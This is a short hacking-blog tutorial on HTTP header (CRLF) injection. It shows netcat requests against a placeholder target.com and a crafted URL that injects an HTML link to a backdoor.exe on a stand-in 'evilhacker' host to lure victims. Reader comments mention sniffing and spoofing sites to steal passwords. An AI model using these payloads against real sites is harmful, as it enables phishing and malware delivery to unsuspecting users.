HTTP header injection

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie  etc. It is much like XSS.

Basically this vulnerability found in “set-cookie” and “location”  . If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this get request we get like(Try to find it):

set-cookie=PaymentMethod=credit

If this is behavior of the host then we should try to insert Carriage-return and Line-feed :

nc -vv target.com 80  
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:

set-cookie=PaymentMethod=credi

it-is=vulnerable 

Simply a hacker can force the users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1

We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉

Be aware!!!

5 Replies to “HTTP header injection”

  1. Sniff the remote way its normal using http so you can just sniff the pass out in lan else just spoof "copy website" and make it send info to ur website but why steal facebook hahahahaha really its for kids

  2. He doesn't need to "proof it" because this is basic knowledge. I'm sure if you knew a thing about spoofing passwords than you would need him to "proof it".

Leave a Reply

Your email address will not be published. Required fields are marked *